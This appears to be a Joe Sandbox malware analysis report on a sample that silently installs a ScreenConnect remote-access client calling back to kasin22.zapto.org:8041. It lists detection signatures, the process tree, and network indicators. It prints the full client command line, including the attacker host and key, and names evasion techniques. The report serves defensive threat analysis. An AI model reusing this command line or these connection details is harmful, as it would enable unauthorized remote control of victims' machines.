Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1557086
MD5:093b0062fbf8663736ced8f41859ff58
SHA1:20b26d4cc9e13c560bc1e86920f5965291cc4d7a
SHA256:64ca91a2446a8e567b24deea926bbdb34fd2dda221577787bbb62d07cbf0272d
Tags:exeuser-Bitsight
Infos:

Detection

ScreenConnect Tool
Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:32
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Creates files in the system32 config directory
Detected potential unwanted application
Enables network access during safeboot for specific services
Modifies security policies related information
Possible COM Object hijacking
Reads the Security eventlog
Reads the System eventlog
Sigma detected: Remote Access Tool - ScreenConnect Suspicious Execution
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for available system drives (often done to infect USB drives)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • file.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 093B0062FBF8663736CED8F41859FF58)
    • msiexec.exe (PID: 4512 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • msiexec.exe (PID: 2096 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 6488 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D C MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 716 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 3820 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BE MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • msiexec.exe (PID: 5256 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • ScreenConnect.ClientService.exe (PID: 2448 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 4180 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
    • ScreenConnect.WindowsClient.exe (PID: 6196 cmdline: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
file.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      C:\Config.Msi\5de52c.rbsJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        C:\Windows\Installer\MSIE7CB.tmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          SourceRuleDescriptionAuthorStrings
          00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            00000000.00000002.2163119833.0000000005AF0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                  00000000.00000000.2130060799.0000000000A26000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                    Click to see the 5 entries
                    SourceRuleDescriptionAuthorStrings
                    9.2.ScreenConnect.WindowsClient.exe.2c6fa28.0.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                      9.0.ScreenConnect.WindowsClient.exe.950000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                        0.2.file.exe.5af0000.8.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                          0.2.file.exe.5af0000.8.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                            0.0.file.exe.ad5db8.2.raw.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                              Click to see the 4 entries

                              System Summary

                              barindex
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", CommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, NewProcessName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, OriginalFileName: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c=", ProcessId: 2448, ProcessName: ScreenConnect.ClientService.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: ScreenConnect Client (e6cb77284cf765aa) Credential Provider, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\msiexec.exe, ProcessId: 2096, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\(Default)
                              No Suricata rule has matched

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: file.exeVirustotal: Detection: 26%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF0B51 CryptUnprotectData,8_2_05BF0B51
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF0AA0 CryptUnprotectData,8_2_05BF0AA0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05BF0A99 CryptUnprotectData,8_2_05BF0A99
                              Source: C:\Users\user\Desktop\file.exeEXE: msiexec.exeJump to behavior

                              Compliance

                              barindex
                              Source: C:\Users\user\Desktop\file.exeEXE: msiexec.exeJump to behavior
                              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: file.exeStatic PE information: certificate valid
                              Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: file.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: file.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.5.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: file.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.3392174323.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250157916.000000001BD62000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2250038149.000000001BD20000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: file.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.2185677970.0000000000B0D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2160635976.0000000004B50000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: file.exe, MSIE7CB.tmp.3.dr, MSIE7EB.tmp.3.dr, MSIEC9F.tmp.3.dr, setup.msi.0.dr, 5de52c.rbs.3.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2196014508.0000000000952000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: file.exe, MSIE114.tmp.2.dr, setup.msi.0.dr, 5de52d.msi.3.dr, 5de52b.msi.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: file.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.3406070630.0000000002A57000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: file.exe
                              Source: C:\Windows\System32\msiexec.exeFile opened: z:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: x:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: v:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: t:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: r:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: p:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: n:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: l:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: j:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: h:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: f:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: b:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: y:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: w:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: u:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: s:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: q:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: o:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: m:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: k:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: i:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: g:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: e:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: c:Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile opened: a:Jump to behavior

                              Networking

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry value created: NULL ServiceJump to behavior
                              Source: global trafficTCP traffic: 192.168.2.6:49714 -> 194.59.30.222:8041
                              Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: global trafficDNS traffic detected: DNS query: kasin22.zapto.org
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                              Source: ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2247542217.00000000130E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: file.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: ScreenConnect.ClientService.exe, 00000008.00000002.3393549461.0000000001CB3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2240241661.00000000030D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.2158572880.0000000004CC8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158572880.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2158782507.0000000004B53000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
